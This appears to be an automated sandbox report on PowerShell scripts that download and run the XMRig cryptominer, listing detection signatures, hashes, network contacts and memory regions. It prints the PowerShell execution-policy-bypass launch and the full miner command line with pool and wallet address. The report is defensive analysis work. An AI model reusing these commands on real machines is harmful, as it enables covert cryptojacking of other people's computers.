| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4904-10-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-25-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-29-0x00007FFFD3123000-0x00007FFFD3124000-memory.dmp
memory/4904-30-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-31-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-32-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-65-0x0000021D779C0000-0x0000021D779CA000-memory.dmp
memory/4904-52-0x0000021D779E0000-0x0000021D779F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2300-94-0x00000297502A0000-0x00000297502C0000-memory.dmp
memory/2300-95-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-96-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-97-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-98-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-99-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-100-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-101-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-102-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-103-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-104-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-105-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-106-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-107-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-108-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-109-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-110-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-111-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-112-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-113-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-114-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-115-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-116-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-117-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
memory/2300-118-0x00007FF6C1190000-0x00007FF6C1DC3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2620 wrote to memory of 4912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2620 wrote to memory of 4912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/2620-0-0x00007FFA71593000-0x00007FFA71595000-memory.dmp
memory/2620-6-0x000002957D860000-0x000002957D882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4djhohuh.4pu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2620-11-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-12-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-13-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-14-0x00007FFA71593000-0x00007FFA71595000-memory.dmp
memory/2620-15-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-17-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/2620-18-0x000002957DD50000-0x000002957DD62000-memory.dmp
memory/2620-19-0x000002957DD10000-0x000002957DD1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4912-50-0x00000153FA490000-0x00000153FA4B0000-memory.dmp
memory/4912-51-0x00000153FBE90000-0x00000153FBEB0000-memory.dmp
memory/4912-52-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-53-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-54-0x00000153FBEB0000-0x00000153FBED0000-memory.dmp
memory/4912-55-0x00000153FBED0000-0x00000153FBEF0000-memory.dmp
memory/4912-56-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/2620-57-0x00007FFA71590000-0x00007FFA72051000-memory.dmp
memory/4912-58-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-59-0x00000153FBEB0000-0x00000153FBED0000-memory.dmp
memory/4912-60-0x00000153FBED0000-0x00000153FBEF0000-memory.dmp
memory/4912-61-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-62-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-63-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-64-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-65-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-66-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-67-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-68-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-69-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-70-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-71-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-72-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-73-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-74-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-75-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-76-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-77-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-78-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-79-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-80-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-81-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
279s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 888 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 888 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
memory/888-0-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-2-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-1-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-3-0x0000028E3E6D0000-0x0000028E3E6F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcunwxbo.oez.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/888-12-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-13-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-15-0x0000028E3E780000-0x0000028E3E792000-memory.dmp
memory/888-16-0x0000028E26270000-0x0000028E2627A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3932-47-0x000001E2AF070000-0x000001E2AF090000-memory.dmp
memory/3932-48-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/3932-49-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-51-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/3932-50-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-52-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-53-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-54-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-55-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-56-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-57-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-58-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-59-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-60-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-61-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-62-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-63-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-64-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-65-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-66-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-67-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-68-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-69-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-70-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-71-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-72-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-73-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-74-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-75-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
291s
Max time network
267s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 216 wrote to memory of 2844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 216 wrote to memory of 2844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/216-0-0x00007FF9A8013000-0x00007FF9A8015000-memory.dmp
memory/216-1-0x000002707A680000-0x000002707A6A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1i4fywp.oyl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/216-11-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-12-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-13-0x00007FF9A8013000-0x00007FF9A8015000-memory.dmp
memory/216-14-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-16-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-17-0x000002707ADF0000-0x000002707AE02000-memory.dmp
memory/216-18-0x000002707ADE0000-0x000002707ADEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2844-49-0x000001A356050000-0x000001A356070000-memory.dmp
memory/2844-50-0x000001A3560A0000-0x000001A3560C0000-memory.dmp
memory/2844-51-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-52-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-54-0x000001A357990000-0x000001A3579B0000-memory.dmp
memory/2844-53-0x000001A3560C0000-0x000001A3560E0000-memory.dmp
memory/2844-55-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/216-56-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/2844-57-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-58-0x000001A3560C0000-0x000001A3560E0000-memory.dmp
memory/2844-59-0x000001A357990000-0x000001A3579B0000-memory.dmp
memory/2844-60-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-61-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-62-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-63-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-64-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-65-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-66-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-67-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-68-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-69-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-70-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-71-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-72-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
